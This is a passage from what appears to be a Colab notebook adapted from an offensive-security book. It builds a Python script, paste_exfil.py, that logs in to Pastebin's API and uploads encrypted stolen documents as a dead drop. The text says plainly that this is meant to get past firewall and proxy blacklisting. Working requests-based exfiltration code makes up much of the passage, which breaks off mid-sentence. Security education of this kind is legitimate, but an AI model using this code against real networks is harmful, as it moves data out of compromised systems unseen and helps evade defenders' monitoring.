<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/Exfiltration_Via_A_Web_Server.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Exfiltration via a Web Server__*

Next, we'll write a new file, __paste_exfil.py__, to send our encrypted information by posting to a web server. We'll automate the process of posting the encrypted document to an account on https://pastebin.com/. This will enable us to dead-drop the document and retrieve it when we want to without any-one else being able to decrypt it. By using a well-known site like __Pastebin__, we should also be able to bypass any blacklisting that a firewall or proxy may have, which might otherwise prevent us from just sending the document to an IP address or web server that we control. Let's start by putting some supporting functions into our exfiltration scirpt. Open up __paste_exfil.py__ and enter the following code:

In [ ]:
from win32com import client #1

import os
import random
import requests #2
import time

username = 'tim' #3
password = 'seKret'
api_dev_key = 'cd3xxx001xxxx02'

We import __requests__ to handle the platform-independent function __[2]__, and we'll use __win32com__'s client class for the Windows-specific function __[1]__. We'll authenticate to the https://pastebin.com/ web server and upload the encrypted string. In order to authenticate, we define the __username__ and __password__ and the __api_dev_key__ __[3]__.

Now that we've defined our imports and settings, let's write the platform-independent function __plain_paste__:

In [ ]:
def plain_paste(title, contents): #1
    login_url = 'https://pastebin.com/api/api_login.php'
    login_data = { #2
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    r = requests.post(login_url, data=login_data)
    api_user_key = r.text #3

    paste_url = 'https://pastebin.com/api/api_post.php' #4
    paste_data = {
        'api_paste_name': title,
        'api_paste_code': contents.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': api_user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    r = requests.post(paste_url, data=paste_data) #5
    print(r.status_code)
    print(r.text)

Like the preceding email functions, the __plain_paste__ function receives the filename for a title and encrypted contents as arguments __[1]__. You need to make two requests in order to create the paste under your own username. First, make a post to the __login API__, specifying your __username__, __api_dev_key__, and __password__ __[2]__. The response from that post is your __api_user_key__. That bit of data is what you need to create a pastte under your own username __[3]__. The second request is to the __post API__ __[4]__. Send it the name of your paste (the filename is our title) and the contents, along with your __user__ and __dev__